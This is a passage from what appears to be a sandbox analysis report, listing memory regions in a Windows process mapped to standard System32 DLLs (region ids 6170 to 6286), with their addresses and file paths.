"c:\\windows\\system32\\rtutils.dll") Region: id = 6170 start_va = 0x7ffc4cff0000 end_va = 0x7ffc4d0b3fff entry_point = 0x7ffc4cff0000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 6171 start_va = 0x7ffc4d170000 end_va = 0x7ffc4d1d0fff entry_point = 0x7ffc4d170000 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 6172 start_va = 0x7ffc4d1e0000 end_va = 0x7ffc4d1f8fff entry_point = 0x7ffc4d1e0000 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 6173 start_va = 0x7ffc4d200000 end_va = 0x7ffc4d23ffff entry_point = 0x7ffc4d200000 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 6174 start_va = 0x7ffc4d240000 end_va = 0x7ffc4d256fff entry_point = 0x7ffc4d240000 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 6175 start_va = 0x7ffc4d310000 end_va = 0x7ffc4d367fff entry_point = 0x7ffc4d310000 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 6176 start_va = 0x7ffc4d370000 end_va = 0x7ffc4d38cfff entry_point = 0x7ffc4d370000 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 6177 start_va = 0x7ffc4d390000 end_va = 0x7ffc4d3a2fff entry_point = 0x7ffc4d390000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 6178 start_va = 0x7ffc4d470000 end_va = 0x7ffc4d477fff entry_point = 0x7ffc4d470000 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 6179 start_va = 0x7ffc4d910000 end_va = 0x7ffc4d98efff entry_point = 0x7ffc4d910000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 6180 start_va = 0x7ffc4d990000 end_va = 0x7ffc4d9cbfff entry_point = 0x7ffc4d990000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 6181 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 6182 start_va = 0x7ffc4f370000 end_va = 0x7ffc4f38cfff entry_point = 0x7ffc4f370000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 6183 start_va = 0x7ffc4f620000 end_va = 0x7ffc4f651fff entry_point = 0x7ffc4f620000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 6184 start_va = 0x7ffc4f660000 end_va = 0x7ffc4f686fff entry_point = 0x7ffc4f660000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 6185 start_va = 0x7ffc4f690000 end_va = 0x7ffc4f6a7fff entry_point = 0x7ffc4f690000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 6186 start_va = 0x7ffc4f6b0000 end_va = 0x7ffc4f832fff entry_point = 0x7ffc4f6b0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 6187 start_va = 0x7ffc4f8f0000 end_va = 0x7ffc4f981fff entry_point = 0x7ffc4f8f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 6188 start_va = 0x7ffc4f990000 end_va = 0x7ffc4f9c8fff entry_point = 0x7ffc4f990000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 6189 start_va = 0x7ffc4f9d0000 end_va = 0x7ffc4f9d8fff entry_point = 0x7ffc4f9d0000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 6190 start_va = 0x7ffc4f9e0000 end_va = 0x7ffc4fa14fff entry_point = 0x7ffc4f9e0000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 6191 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 6192 start_va = 0x7ffc50700000 end_va = 0x7ffc50708fff entry_point = 0x7ffc50700000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 6193 start_va = 0x7ffc50710000 end_va = 0x7ffc5073cfff entry_point = 0x7ffc50710000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 6194 start_va = 0x7ffc50740000 end_va = 0x7ffc5074ffff entry_point = 0x7ffc50740000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 6195 start_va = 0x7ffc50750000 end_va = 0x7ffc507a0fff entry_point = 0x7ffc50750000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 6196 start_va = 0x7ffc507b0000 end_va = 0x7ffc507bbfff entry_point = 0x7ffc507b0000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 6197 start_va = 0x7ffc507c0000 end_va = 0x7ffc5087dfff entry_point = 0x7ffc507c0000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 6198 start_va = 0x7ffc50880000 end_va = 0x7ffc50915fff entry_point = 0x7ffc50880000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 6199 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 6200 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 6201 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 6202 start_va = 0x7ffc50bd0000 end_va = 0x7ffc50bebfff entry_point = 0x7ffc50bd0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6203 start_va = 0x7ffc50c00000 end_va = 0x7ffc50d30fff entry_point = 0x7ffc50c00000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 6204 start_va = 0x7ffc50d40000 end_va = 0x7ffc50d7dfff entry_point = 0x7ffc50d40000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 6205 start_va = 0x7ffc50ec0000 end_va = 0x7ffc50ed7fff entry_point = 0x7ffc50ec0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6206 start_va = 0x7ffc50ee0000 end_va = 0x7ffc50f93fff entry_point = 0x7ffc50ee0000 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 6207 start_va = 0x7ffc51180000 end_va = 0x7ffc511acfff entry_point = 0x7ffc51180000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 6208 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6209 start_va = 0x7ffc51410000 end_va = 0x7ffc5141ffff entry_point = 0x7ffc51410000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 6210 start_va = 0x7ffc51420000 end_va = 0x7ffc5142ffff entry_point = 0x7ffc51420000 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 6211 start_va = 0x7ffc51430000 end_va = 0x7ffc5145dfff entry_point = 0x7ffc51430000 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 6212 start_va = 0x7ffc51460000 end_va = 0x7ffc514a1fff entry_point = 0x7ffc51460000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 6213 start_va = 0x7ffc514b0000 end_va = 0x7ffc514c5fff entry_point = 0x7ffc514b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6214 start_va = 0x7ffc514d0000 end_va = 0x7ffc514e6fff entry_point = 0x7ffc514d0000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 6215 start_va = 0x7ffc51500000 end_va = 0x7ffc5156dfff entry_point = 0x7ffc51500000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 6216 start_va = 0x7ffc51570000 end_va = 0x7ffc51580fff entry_point = 0x7ffc51570000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 6217 start_va = 0x7ffc51590000 end_va = 0x7ffc5159cfff entry_point = 0x7ffc51590000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 6218 start_va = 0x7ffc515a0000 end_va = 0x7ffc515dffff entry_point = 0x7ffc515a0000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 6219 start_va = 0x7ffc515e0000 end_va = 0x7ffc516dbfff entry_point = 0x7ffc515e0000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 6220 start_va = 0x7ffc516e0000 end_va = 0x7ffc51759fff entry_point = 0x7ffc516e0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 6221 start_va = 0x7ffc51760000 end_va = 0x7ffc5181ffff entry_point = 0x7ffc51760000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 6222 start_va = 0x7ffc51820000 end_va = 0x7ffc51832fff entry_point = 0x7ffc51820000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 6223 start_va = 0x7ffc51840000 end_va = 0x7ffc5185dfff entry_point = 0x7ffc51840000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 6224 start_va = 0x7ffc51860000 end_va = 0x7ffc51886fff entry_point = 0x7ffc51860000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 6225 start_va = 0x7ffc51890000 end_va = 0x7ffc518e4fff entry_point = 0x7ffc51890000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 6226 start_va = 0x7ffc519c0000 end_va = 0x7ffc51a24fff entry_point = 0x7ffc519c0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 6227 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6228 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6229 start_va = 0x7ffc51ca0000 end_va = 0x7ffc51ca9fff entry_point = 0x7ffc51ca0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6230 start_va = 0x7ffc51cb0000 end_va = 0x7ffc51cc7fff entry_point = 0x7ffc51cb0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 6231 start_va = 0x7ffc51cd0000 end_va = 0x7ffc51e1cfff entry_point = 0x7ffc51cd0000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 6232 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6233 start_va = 0x7ffc52cd0000 end_va = 0x7ffc52d47fff entry_point = 0x7ffc52cd0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 6234 start_va = 0x7ffc52d70000 end_va = 0x7ffc52e05fff entry_point = 0x7ffc52d70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6235 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 6236 start_va = 0x7ffc530d0000 end_va = 0x7ffc530dbfff entry_point = 0x7ffc530d0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 6237 start_va = 0x7ffc532b0000 end_va = 0x7ffc532e1fff entry_point = 0x7ffc532b0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 6238 start_va = 0x7ffc532f0000 end_va = 0x7ffc53371fff entry_point = 0x7ffc532f0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 6239 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 6240 start_va = 0x7ffc535d0000 end_va = 0x7ffc535dbfff entry_point = 0x7ffc535d0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 6241 start_va = 0x7ffc53640000 end_va = 0x7ffc53687fff entry_point = 0x7ffc53640000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 6242 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6243 start_va = 0x7ffc53810000 end_va = 0x7ffc5382bfff entry_point = 0x7ffc53810000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 6244 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6245 start_va = 0x7ffc53840000 end_va = 0x7ffc53865fff entry_point = 0x7ffc53840000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6246 start_va = 0x7ffc53920000 end_va = 0x7ffc53951fff entry_point = 0x7ffc53920000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 6247 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6248 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 6249 start_va = 0x7ffc53ba0000 end_va = 0x7ffc53bddfff entry_point = 0x7ffc53ba0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6250 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 6251 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 6252 start_va = 0x7ffc53f30000 end_va = 0x7ffc53f65fff entry_point = 0x7ffc53f30000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 6253 start_va = 0x7ffc53f70000 end_va = 0x7ffc53f95fff entry_point = 0x7ffc53f70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 6254 start_va = 0x7ffc541f0000 end_va = 0x7ffc541f9fff entry_point = 0x7ffc541f0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 6255 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6256 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6257 start_va = 0x7ffc542c0000 end_va = 0x7ffc542e0fff entry_point = 0x7ffc542c0000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 6258 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6259 start_va = 0x7ffc54370000 end_va = 0x7ffc54389fff entry_point = 0x7ffc54370000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 6260 start_va = 0x7ffc54390000 end_va = 0x7ffc54397fff entry_point = 0x7ffc54390000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 6261 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6262 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6263 start_va = 0x7ffc54440000 end_va = 0x7ffc544d7fff entry_point = 0x7ffc54440000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 6264 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6265 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6266 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6267 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6268 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6269 start_va = 0x7ffc54670000 end_va = 0x7ffc54c97fff entry_point = 0x7ffc54670000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6270 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cf3fff entry_point = 0x7ffc54ca0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 6271 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6272 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6273 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6274 start_va = 0x7ffc55220000 end_va = 0x7ffc5527afff entry_point = 0x7ffc55220000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 6275 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6276 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6277 start_va = 0x7ffc55630000 end_va = 0x7ffc557f4fff entry_point = 0x7ffc55630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 6278 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6279 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6280 start_va = 0x7ffc559d0000 end_va = 0x7ffc56ef4fff entry_point = 0x7ffc559d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6281 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6282 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6283 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6284 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6285 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6286 